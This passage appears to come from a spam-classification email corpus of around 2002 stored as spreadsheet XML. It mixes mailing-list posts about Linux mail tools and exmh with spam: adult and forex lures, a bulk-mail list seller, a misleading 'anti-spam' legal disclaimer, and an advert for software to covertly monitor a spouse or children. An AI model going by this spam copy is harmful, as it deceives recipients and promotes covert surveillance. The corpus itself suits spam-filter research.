 			&lt;p&gt;&lt;B&gt;&lt;A HREF="http://80.71.70.144/re.php?cid=21&amp;eid=am1AbmV0bm90ZWluYy5jb20=&amp;url=80.71.70.144/wfs/?aid=919777"&gt;&lt;FONT COLOR="#0000FF"&gt;Just go to the site and enter your email that is all!&lt;BR&gt;HURRY they will not be doing this forever!!!&lt;/FONT&gt;&lt;/A&gt;&lt;/B&gt;&lt;/p&gt;
 			&lt;table width="100%" border="1" cellpadding="10"&gt; 
 				&lt;tr&gt; 
 					&lt;td bgcolor="#000000" VALIGN="TOP"&gt;
 					&lt;div align="center"&gt;&lt;A HREF="http://80.71.70.144/re.php?cid=21&amp;eid=am1AbmV0bm90ZWluYy5jb20=&amp;url=80.71.70.144/wfs/?aid=919777"&gt;
 					&lt;IMG SRC="http://80.71.70.144/ads/images/hal002.gif" WIDTH="468" HEIGHT="180" BORDER="0"&gt;
 					&lt;/A&gt;&lt;/div&gt;
 					&lt;/td&gt;
 				&lt;/tr&gt; 
 			&lt;/table&gt;
 		&lt;/TD&gt;
 	&lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/font&gt;
 &lt;/DIV&gt;
 &lt;p&gt; &lt;/p&gt;
 &lt;p&gt; &lt;/p&gt;
 &lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;VERY GRAPHIC MATERIAL - MATURE AUDIENCE ONLY! &lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;You MUST be at least 18 years old to enter!&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;br&gt;&lt;br&gt;&lt;/p&gt;
 &lt;p&gt; &lt;/p&gt;
 &lt;p&gt; &lt;/p&gt;
 &lt;p align="left"&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;This 
 email was sent to you because your email address is part of a targeted opt-in 
 list.You have received this &lt;br&gt; email by either requesting more information on 
 one of our sites or someone may have used your email address.&lt;br&gt; If you received 
 this email in error, please accept our apologies.&lt;br&gt; If you do not wish to receive 
 further offers, please click below and enter your email to remove your email from 
 future offers. &lt;/font&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;
 &lt;a href="http://www.remove-my-email.com/unsub.php?cid=21&amp;eid=am1AbmV0bm90ZWluYy5jb20="&gt;Click Here to Remove&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;Anti-SPAM 
 Policy Disclaimer: Under Bill s.1618 Title III passed by the 105th U. S. Congress, 
 mail cannot be considered spam &lt;br&gt; as long as we include contact information 
 and a remove link for removal from this mailing list. If this e-mail is unsolicited, 
 please &lt;br&gt; accept our apologies. Per the proposed H.R. 3113 Unsolicited Commercial 
 Electronic Mail Act of 2000, further transmissions &lt;br&gt; to you by the sender may 
 be stopped at NO COST to you!&lt;/font&gt;&lt;br&gt;&lt;/p&gt;
 &lt;img src="http://80.71.70.144/ss.php?cid=21&amp;eid=am1AbmV0bm90ZWluYy5jb20="&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [zzzzteana] The Cafe Forteana is back online!!!
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;  &gt; Ok, but you'll still let me leave that black and white one there too,
 &gt;&gt;  right? I like that one!!!
 &gt;&gt;  --
 &gt;&gt;
 &gt;&gt;
 &gt;&gt;  Fel
 &gt;
 &gt;Okay.  I see you like that 1940's starlet look then....
 &gt;
 &gt;I should think about a bio bit, but maybe I'll just remain enigmatic and
 &gt;maintain my mystique*
 &gt;
 &gt;Helen of Troy
 &gt;*by Lentheric :-)
 &gt;
 Or you could let me write one for you? Mind you ...... I know an 
 awful lot about you! ;-))
 Yes, I like that starlet look, but I think you should come out from 
 behind that bike too and let us see what you are wearing.  looks 
 pretty innerestin'
 -- 
 Fel
 NEW!! Cafe Forteana is back: http://www.frogstone.net/Cafe/CafeForteana.html
 http://www.frogstone.net
 Weird Page: http://my.athenet.net/~felinda/WeirdPage.html
 [Non-text portions of this message have been removed]
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 Sell a Home with Ease!
 http://us.click.yahoo.com/SrPZMC/kTmEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Free Foreign Currency Newsletter
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;
 &lt;BODY&gt;
 &lt;/FONT&gt;&lt;/FONT&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;
 &lt;p&gt;&lt;FONT face=3D"MS Sans Serif"&gt;&lt;p&gt;&lt;FONT size=3D2&gt; &lt;!DOCTYPE HTML PUBLIC "=
 -//W3C//DTD HTML 4.0 Transitional//EN"&gt;&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Untitled Documen=
 t&lt;/TITLE&gt;&lt;META http-equiv=3DContent-Type content=3D"text/html; charset=3Dw=
 indows-1252"&gt;&lt;META content=3D"MSHTML 5.50.4611.1300" name=3DGENERATOR&gt;&lt;/HE=
 AD&gt;&lt;BODY bgColor=3D#ffffff&gt;&lt;DIV align=3Dcenter&gt;&lt;TABLE cellSpacing=3D0 cell=
 Padding=3D0 width=3D620 border=3D0&gt;  &lt;TBODY&gt;  &lt;TR&gt;      &lt;TD width=3D100&gt;&lt;B=
 R&gt;        &lt;BR&gt;&lt;/TD&gt;    &lt;TD width=3D437&gt;        &lt;DIV align=3Dcenter&gt;       =
     &lt;H1&gt;&lt;FONT face=3D"Times New Roman, Times, serif" color=3D#000066&gt;&lt;B&gt;&lt;I=
 &gt;&lt;/I&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;I&gt;&lt;B&gt;&lt;img src=3D"http://211.152.134.203/~inbox002/bank.jp=
 g" width=3D"550" height=3D"172"&gt;&lt;/B&gt;&lt;/I&gt;&lt;/H1&gt;        &lt;/DIV&gt;&lt;/TD&gt;      &lt;TD =
 vAlign=3Dtop width=3D83&gt;&amp;nbsp;&lt;/TD&gt;    &lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;TABLE cellSpa=
 cing=3D0 cellPadding=3D0 width=3D621 border=3D0&gt;  &lt;TBODY&gt;  &lt;TR&gt;    &lt;TD&gt;   =
    &lt;DIV align=3Dcenter&gt;      &lt;HR&gt;          &lt;FONT face=3D"Times New Roman, =
 Times, serif"&gt;&lt;B&gt;&lt;FONT color=3D#0000cc size=3D4&gt;Volume Over 1.2 Trillion D=
 ollars a Day&lt;BR&gt;          &lt;FONT color=3D#000000 size=3D5&gt;Tap into the high=
 -income       opportunity found in the World's largest financial       mar=
 ket.&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;       &lt;P align=3Dcenter&gt;&lt;FONT face=3D"Times =
 New Roman, Times, serif" color=3D#ff0000 size=3D6&gt;&lt;B&gt;&lt;FONT color=3D#0000cc=
 &gt;The&lt;/FONT&gt; Foreign Currency &lt;FONT color=3D#0000cc&gt;Markets&lt;/FONT&gt; &lt;BR&gt;&lt;/B&gt;=
 &lt;/FONT&gt;&lt;/P&gt;      &lt;HR width=3D560&gt;      &lt;FONT face=3D"Times New Roman, Time=
 s, serif" color=3D#0000cc size=3D4&gt;&lt;B&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/DIV&gt;      &lt;BLOCKQUOTE&gt; =
        &lt;DIV align=3Dleft&gt;        &lt;P&gt;&lt;FONT face=3D"Times New Roman, Times, =
 serif" color=3D#0000cc size=3D4&gt;&lt;B&gt;Discover how:&lt;BR&gt;              &lt;FONT co=
 lor=3D#000066&gt;$20,000 "properly positioned" in the Euro vs.               =
 the US Dollar, on 12/13/00 could have returned $70,000 on 1/03/01&lt;/FONT&gt;&lt;/=
 B&gt;&lt;/FONT&gt;&lt;/P&gt;            &lt;P align=3D"center"&gt;&lt;FONT face=3D"Times New Roman=
 , Times, serif" color=3D#000066 size=3D4&gt;&lt;B&gt;Learn how successful professio=
 nal traders assisting you can potentially achieve double-digit monthly ret=
 urns of 10-30% or more!&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;          &lt;DIV align=3Dcenter&gt;&lt;FONT =
 size=3D5&gt;&lt;A href=3D"http://211.152.134.203/~inbox002/signupform.htm"&gt;     =
   &lt;FONT color=3D#0000ff&gt;Click Here&lt;/FONT&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;p&gt;      &lt;/DIV&gt;   =
    &lt;DIV align=3Dcenter&gt;      &lt;HR&gt;            &lt;p&gt;&lt;FONT face=3D"Times New Ro=
 man, Times, serif" color=3D#0000cc size=3D4&gt;&lt;B&gt;&lt;font color=3D"#000066"&gt;For=
               a &lt;font color=3D"#0000FF"&gt;Free Foreign Currency Trading News=
 letter&lt;/font&gt;               and a comprehensive report on the foreign curr=
 ency markets.&lt;/font&gt;&lt;/B&gt;&lt;/font&gt;&lt;/p&gt;            &lt;p&gt;&lt;FONT face=3D"Times New =
 Roman, Times, serif" color=3D#0000cc size=3D4&gt;&lt;B&gt;&lt;font color=3D"#000066"&gt;C=
 lick on the link below. &lt;/font&gt;&lt;/B&gt;&lt;/font&gt;&lt;/p&gt;          &lt;FONT face=3D"Time=
 s New Roman, Times, serif" color=3D#0000cc size=3D4&gt;      &lt;P&gt;      &lt;DIV al=
 ign=3Dcenter&gt;&lt;FONT size=3D5&gt;&lt;A href=3D"http://211.152.134.203/~inbox002/si=
 gnupform.htm"&gt;&lt;FONT color=3D#0000ff&gt;Click Here&lt;/FONT&gt;&lt;/A&gt;&lt;/FONT&gt;      &lt;P&gt;&lt;=
 /P&gt;      &lt;/DIV&gt;      &lt;HR&gt;       &lt;DIV align=3Dcenter&gt;&lt;FONT face=3D"Times Ne=
 w Roman, Times, serif" color=3D#0000cc size=3D1&gt;&lt;FONT color=3D#000000 size=
 =3D1&gt;&lt;B&gt;There is considerable exposure to risk in any Forex (FX) transacti=
 on. Before deciding to         participate in FX trading,&lt;BR&gt;you should ca=
 refully consider your         objectives, level of experience and risk app=
 etite. Most importantly         don't invest money &lt;BR&gt;you can't afford to=
        lose.&lt;/B&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;/font&gt;&lt;/BLOCKQUOTE&gt;&lt;FONT face=3D"Time=
 s New Roman, Times, serif" color=3D#0000cc size=3D4&gt;      &lt;DIV align=3Dcen=
 ter&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif" color=3D#000000 size=3D1&gt;&lt;=
 B&gt;If you are receiving this e-mail in error, we sincerely apologize. Simpl=
 y click on Reply Remove in the subject line. We Honor any and all Remove R=
 equests. Any attempt to disable this Remove acct will only prevent others =
 from being removed. Again, we  apologize for any inconvenience and it wont=
  happen again.     &lt;/B&gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;/font&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/DIV=
 &gt;&lt;/BODY&gt;&lt;/HTML&gt;&lt;BR&gt;&lt;p&gt;&lt;BR&gt;&lt;p&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;p&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p=
 &gt;&lt;p&gt;&lt;p&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Increase Your Business Sales NOW     adv          ctk
</t>
  </si>
  <si>
    <t xml:space="preserve">Email marketing - if done right - is both highly effective and amazingly cost effective.  OK, it can be 
 downright PROFITABLE.  If done right.
 Imagine sending your sales letter to one million, two million, ten million or more prospects during 
 the night.  Then waking up to sales orders, ringing phones, and an inbox full of freshly qualified 
 leads.
 We've been in the email business for over seven years now.
 Our lists are large, current, and deliverable.  We have more servers and bandwidth than we currently 
 need.  That's why we're sending you this note.  We'd like to help you make your email marketing 
 program more robust and profitable.
 Please give us permission to call you with a proposal custom tailored to your business.  Just fill out 
 this form to get started:
 Name _______________________
 Email Address ________________
 Phone Number ________________
 URL or Web Address ___________
 I think you'll be delighted with the bottom line results we'll deliver to your company.
 Click Here: mailto:batch1@btamail.net.cn?subject=Inquiry-Including-Contact-Info
 Thank You!
 Remove requests Click Here: mailto:batch1@btamail.net.cn?subject=remove-b2b-list
 licatdcknjhyynfrwgwyyeuwbnrqcbh
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: "Free" Elvis Costello CD a trojan horse for DRM malware
</t>
  </si>
  <si>
    <t xml:space="preserve">A friend in Dublin is mailing me the CD which was in the UK Sunday 
 Times. I've just been advised that running it in a Win32 machine is 
 dangerous as all get out.
 http://www.theregister.co.uk/content/4/27232.html
 -- whump
 ----
 Bill Humphries &lt;bill@whump.com&gt;
 http://www.whump.com/moreLikeThis/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] Retrieving read mail from webmail.eircom.net via POP ?
</t>
  </si>
  <si>
    <t xml:space="preserve">Seems fetchmail has a -a switch to get it all.
 Just need to install fetchmail now :)
 Glen
 On Mon, 2002-10-07 at 10:17, Stephane Dudzinski wrote:
 &gt; Funny enough, that also happened to a Friend of mine who uses both the
 &gt; web interface and a pop client. Last time i tried to send a picture
 &gt; which was around 100k, it got denied saying that quota was exceeded.
 &gt; When he looked at his account on the web, it mentionned 5 MB free, so i
 &gt; have no idea what they're playing at ...
 &gt; 
 &gt; Doesn't really help but just wanted to confirm the problem. 
 &gt; 
 &gt; Steph
 &gt; 
 &gt; On Mon, 2002-10-07 at 10:10, Glen Gray wrote:
 &gt; &gt; Is there a way to get my read email downloaded off webmail.eircom.net.
 &gt; &gt; 
 &gt; &gt; I've been reading the emails using the web based interface. But I've
 &gt; &gt; reached my quota limit. There doesn't seem to be any way to get the
 &gt; &gt; emails off the server. I can connect to the account using POP, but that
 &gt; &gt; only retrieves unread emails. There's also no way to mark emails as
 &gt; &gt; unread from the html interface.
 &gt; &gt; 
 &gt; &gt; Is there a way I can use fetchmail perhaps to get it to pull down all
 &gt; &gt; the emails and remove them off the server.
 &gt; &gt; 
 &gt; &gt; It's been years since I've used fetchmail, I don't recall be able to do
 &gt; &gt; this.
 &gt; &gt; 
 &gt; &gt; Any other suggestions welcome. There's a few hundred email so I don't
 &gt; &gt; fancy going through each one forwarding it to another account.
 &gt; &gt; 
 &gt; &gt; Glen
 &gt; &gt; 
 &gt; &gt; 
 &gt; &gt; 
 &gt; &gt; 
 &gt; &gt; -- 
 &gt; &gt; Irish Linux Users' Group: ilug@linux.ie
 &gt; &gt; http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 &gt; &gt; List maintainer: listmaster@linux.ie
 &gt; -- 
 &gt; ______________________________________________
 &gt; Stephane Dudzinski       Systems Administrator
 &gt; NewWorldIQ            	     t: +353 1 4334357
 &gt; www.newworldiq.com           f: +353 1 4334301
 &gt; 
 &gt; -- 
 &gt; Irish Linux Users' Group: ilug@linux.ie
 &gt; http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 &gt; List maintainer: listmaster@linux.ie
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri Sep 13 2002 at 07:46, "Kevin Oberman" wrote:
 &gt; &gt; &gt; What is an example of an "anything else" that it fails for for you?
 &gt; &gt;
 &gt; &gt; Everything else :)  I can't even mark text in an exmh message window
 &gt; &gt; and then paste it into a terminal window, the cut buffer seems to be
 &gt; &gt; completely empty (and its previous contents are no longer there
 &gt; &gt; either).
 &gt; (This is all guess work and may be bogus.)
 &gt; 
 &gt; Are you running Gnome 1.4? I had similar problems as did several
 &gt; co-workers. Updating my Gnome components has fixed it for me and
 &gt; others, although I can't say exactly which component did the
 &gt; trick. Gnomecore or gtk would seem most likely, but it may have been
 &gt; something else.
 Indeed I am (this workstation is rh7.2 with gnome1.4, it [mostly?]
 works, so I hadn't bothered to updated it to 7.3:)
 &gt; In any case, I have not seen the problem for quite a while, now.
 So upgrading gnome will fix the problem, it's not an exmh/tktcl
 issue.
 &gt; R. Kevin Oberman, Network Engineer
 Thanks.
 Cheers
 Tony
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] SETI at Home
</t>
  </si>
  <si>
    <t xml:space="preserve">So, I've been letting the little .exe of SETI@Home run endlessly on my PC .  Last total for this upgrade approx.
 420 hours of scanning time.  And still no ET.  I'm so disappointed.
 Does anyone else on the list let Berkeley use their computer for research in this manner?
 http://setiathome.berkeley.edu
 DRS
 [Non-text portions of this message have been removed]
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] SpamNet question
</t>
  </si>
  <si>
    <t xml:space="preserve">Vipul, can I ask questions about SpamNet here?
 I hope so, here goes.. simple question.  How do you define
 username/passwords in spamnet?  I don't see any fields for this option, so
 I'm assuming when someone connects with SpamNet for the first time, they're
 given a unique ID that they keep until they change to a new Outlook client?
 It would be nice if you could specify which username/password to use.  I'd
 like to share my trust account between my work(outlook) and my personal(mutt)
 email accounts.
 &gt; &gt; Perhaps a feature can be added to razor-report, so that it checks whether a
 &gt; &gt; message is spam before it submits it.  If it is spam, then don't send the
 &gt; &gt; body, 4 signatures, etc, just up the "rating" for that individual spam.
 &gt; 
 &gt; Yep, that how razor-agents currently work.
 &gt; 
 &gt; cheers,
 &gt; vipul.
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Secretly Record all internet activity on any computer... BFL
</t>
  </si>
  <si>
    <t xml:space="preserve">FIND OUT WHO THEY ARE CHATTING/E-MAILING WITH ALL THOSE HOURS!
 Is your spouse cheating online? 
 Are your kids talking to dangerous people on instant messenger?
 Find out NOW! - with Big Brother instant software download.
 Click on this link NOW to see actual screenshots and to order!
 http://213.139.76.142/bigbro/index.asp?Afft=M30
 To be excluded from future contacts please visit:
 http://213.139.76.69/PHP/remove.php
 blee
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Family's "pet" raccoon attacks baby in crib
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8417752,1717/
 Date: 2002-10-01T03:29:22+01:00
 (ClickOnDetroit)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Automated forwarding
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt;&gt;&gt;&gt;&gt; On Fri, 13 Sep 2002, "Wendy" == Wendy P. Roberts wrote:
   Wendy&gt; I've been trying to set a button called which
   Wendy&gt; automatically forwards mail using a '-form mycomps'
   Wendy&gt; without going through the editor, but so far haven't got
   Wendy&gt; the right recipe.
 I have one that uses dist to send stuff from my work mail to my 
 home mail.  The binding looks like this:
 set {bindings(key,HD_Dist_Silently -form distcomps.to-me)} &lt;Meta-dollar&gt;
 The "HD_Dist_Silently" is a hacked up version of the proc that 
 does dist in exmh and is pasted in below.  It's getting old and 
 probably should be "resynced" with the current code.  But it 
 still works (on a relatively recent CVS copy of exmh)
 It's also possible that there's an easier way but I hacked this 
 together quickly a year or more ago and when it worked I moved 
 on to other tasks.
 --Hal
 proc HD_Dist_Silently { args } {
     global exmh msg
     set exmh(ctype) {dist}
     if {[string length $args] == 0} {
 	set args Mh_DistSetup
     }
     if [MsgOk $msg(id) m] {
 	if {[string compare [info command $args] $args] == 0} {
 	    # Old interface with hook procedure
 	    if [catch {$args $exmh(folder) $m} err] {   ;# Setup draft msg
 		Exmh_Status "${args}: $err" purple
 		return
 	    }
 	}  else {
 	    if [catch {
 		Exmh_Status "dist +$exmh(folder) $m"
 		eval {MhExec dist +$exmh(folder) $m} -nowhatnowproc $args
 		MhAnnoSetup $exmh(folder) $m dist
 	    } err] {
 		Exmh_Status "dist: $err" purple
 		return
 	    }
 	}
         Edit_Done send				;# Just send it
     }
 }
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Ireland's first great World Cup result
</t>
  </si>
  <si>
    <t xml:space="preserve">--1715101671.1022782885778.JavaMail.root.smtp4
 Content-Type: text/plain; charset=iso-8859-1
 Content-Transfer-Encoding: 7bit
 O'Connor quickly moved his cursor down the left side of the web
 page. Then, showing a flash of his silky skills, he cut across to
 the right hand side and clicked on Top Ten Special Offers. He zipped
 past the Irish Chicken Breast Fillets at 25% off, nipped round the
 HB Selections ice cream also at 25% off and went on with the goal
 firmly in sight:
   - Budweiser '24 pack 500ml cans'. Was E49.20. Now E42.15. SAVE E7.05*
   - Guinness '24 pack 500ml cans'. Was E50.16. Now E42.33. SAVE E7.83*
 With one of his trademark clicks of the mouse he sent his cost-price
 cases of beer straight into the back of his online basket.  1 - 0 to
 Ireland. From there O'Connor was unstoppable and went on to make it
 an unforgettable afternoon as he tucked away another four goals:
   - Pringles Large Tubes 200g. Was E2.05 each. Now buy 2 for E3.00*
   - Hula Hoops Minis Tub 140g. Was E2.42. Now buy one get 2nd half price*
   - Club Twin Packs 2x2 litre. Was E3.10 each.
     Now buy 1 get 2nd half price*
   - Twix 9 pack. Was E1.99. Now buy 1 get 2nd half price*
 To take advantage of these fantastic World Cup offers, click here:
 http://195.200.172.1/I?X=79c1a930104dde9497d901fd0a935ada 
 * Offer ends June 9th. You can't miss it.
 Why not get everyone behind our boys and send this email on to a
 friend so they can enjoy these great offers too?
 Because we're selling cases at cost-price we can only offer a
 maximum of 6 cases of Guinness and 6 cases of Budweiser per household.
 --------------------------------------------------------------------
 All products are subject to availability while stocks last.
 Online prices may vary from those charged in-store.
 Prices in this email are correct at the time of production and are
 subject to change. Please see website for latest prices.
 If you would prefer not to receive emails with news and special
 offers from Tesco.ie, please click here:
 http://www.tesco.ie/register/unsubscribe.asp?from=jm@jmason.org
 This may take up to five working days to unsubscribe.
 --1715101671.1022782885778.JavaMail.root.smtp4
 Content-Type: text/html; charset=iso-8859-1
 Content-Transfer-Encoding: 7bit
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Ireland's first great World Cup result&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#ffffff" text="#000000" link="#CC0033" vlink="#CC0033" alink="#0000FF"&gt;
 &lt;div align="center"&gt; 
   &lt;table width="500" border="1" cellspacing="0" cellpadding="6" bordercolor="#000033" align="center"&gt;
     &lt;tr&gt;
       &lt;td&gt;
         &lt;table width="100%" border="0" cellspacing="0" cellpadding="0"&gt;
           &lt;tr&gt;
             &lt;td&gt;&lt;a href="http://195.200.172.1/I?X=79c1a930104dde948bc6257285b8b6e8" &gt;&lt;img src="http://tesco-mail.realtime.co.uk/ireland/Y00616/top.gif" width="490" height="30" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
       &lt;table width="100%" border="0" cellspacing="0" cellpadding="0"&gt;
           &lt;tr&gt;
             &lt;td bgcolor="#00CC00"&gt;&lt;img src="http://tesco-mail.realtime.co.uk/ireland/Y00616/title_1.gif" width="265" height="92" alt="Cost-price Cases of beer NOW at Tesco.ie"&gt;&lt;img src="http://tesco-mail.realtime.co.uk/ireland/Y00616/result.gif" width="118" height="92"&gt;&lt;img src="http://tesco-mail.realtime.co.uk/ireland/Y00616/football_frames.gif" width="107" height="92"&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width="100%" border="0" cellspacing="0" cellpadding="0"&gt;
           &lt;tr&gt;
             &lt;td&gt;&lt;img src="http://tesco-mail.realtime.co.uk/ireland/Y00616/spacer.gif" width="10" height="10"&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width="100%" border="0" cellspacing="0" cellpadding="0"&gt;
           &lt;tr&gt; 
             &lt;td rowspan="2"&gt;&lt;img src="http://tesco-mail.realtime.co.uk/ireland/Y00616/spacer.gif" width="10" height="10"&gt;&lt;/td&gt;
             &lt;td rowspan="2" valign="top"&gt; 
               &lt;p&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;O&amp;#146;Connor 
                 quickly moved his cursor down the left side of the web page. Then, 
                 showing a flash of his silky skills, he cut across to the right 
                 hand side and clicked on Top Ten Special Offers.&lt;/font&gt;&lt;/p&gt;
               &lt;p&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt; 
                 He zipped past the Irish Chicken Breast Fillets at 25% off, nipped 
                 round the HB Selections ice cream also at 25% off and went on 
                 with the goal firmly in sight.&lt;/font&gt;&lt;/p&gt;
               &lt;p&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;With 
                 one of his trademark clicks of the mouse he sent his cost-price 
                 cases of beer straight into the back of his online basket. 1 &amp;#150; 
                 0 to Ireland. From there O&amp;#146;Connor was unstoppable and went 
                 on to make it an unforgettable afternoon as he tucked away another 
                 four goals.&lt;/font&gt;&lt;/p&gt;
             &lt;/td&gt;
             &lt;td rowspan="2"&gt;&lt;img src="http://tesco-mail.realtime.co.uk/ireland/Y00616/spacer.gif" width="10" height="10"&gt;&lt;/td&gt;
             &lt;td valign="top"&gt; 
               &lt;table width="100%" border="0" cellspacing="0" cellpadding="0"&gt;
                 &lt;tr&gt; 
                   &lt;td&gt; &lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Budweiser 
                     24pack 500ml&lt;br&gt;
                     &lt;font color="CC0033"&gt;Save &amp;euro;7.05&lt;font size="1"&gt;*&lt;/font&gt;&lt;/font&gt;&lt;font color="#FF3300"&gt;&lt;img src="http://tesco-mail.realtime.co.uk/ireland/Y00616/spacer.gif" width="10" height="10"&gt;&lt;font color="#000000"&gt;Was 
                     &amp;euro;49.20&lt;/font&gt;&lt;br&gt;
                     &lt;a href="http://195.200.172.1/I?X=79c1a930104dde94cfa6f32fe052da0e" &gt;Buy Now&lt;/a&gt; &lt;font color="CC0033"&gt;&amp;euro;42.15&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;
                   &lt;td valign="top"&gt;&lt;img src="http://tesco-mail.realtime.co.uk/ireland/Y00616/spacer.gif" width="207" height="6"&gt;&lt;br&gt;
                     &lt;img src="http://tesco-mail.realtime.co.uk/ireland/Y00616/bud_case.gif" width="207" height="97" alt="Budweiser 24pack"&gt;&lt;br&gt;
                     &lt;img src="http://tesco-mail.realtime.co.uk/ireland/Y00616/spacer.gif" width="207" height="4"&gt;&lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
             &lt;td valign="top"&gt;
               &lt;table width="100%" border="0" cellspacing="0" cellpadding="0"&gt;
                 &lt;tr&gt; 
                   &lt;td&gt; &lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Guinness 
                     24pack 500ml&lt;br&gt;
                     &lt;font color="CC0033"&gt;Save &amp;euro;7.83&lt;font size="1"&gt;*&lt;/font&gt;&lt;/font&gt;&lt;font color="#FF3300"&gt;&lt;img src="http://tesco-mail.realtime.co.uk/ireland/Y00616/spacer.gif" width="10" height="10"&gt;&lt;font color="#000000"&gt;Was 
                     &amp;euro;50.16&lt;/font&gt;&lt;br&gt;
                     &lt;a href="http://195.200.172.1/I?X=79c1a930104dde94e7fa9bbe243d14e6" &gt;Buy Now&lt;/a&gt; &lt;font color="CC0033"&gt;&amp;euro;42.33&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt; 
                   &lt;td valign="top"&gt;&lt;img src="http://tesco-mail.realtime.co.uk/ireland/Y00616/spacer.gif" width="207" height="4"&gt;&lt;br&gt;
                     &lt;img src="http://tesco-mail.realtime.co.uk/ireland/Y00616/guinness_case.gif" width="207" height="103" alt="Guinness 24pack"&gt;&lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
       &lt;table width="100%" border="0" cellspacing="0" cellpadding="0"&gt;
           &lt;tr&gt;
             &lt;td&gt;
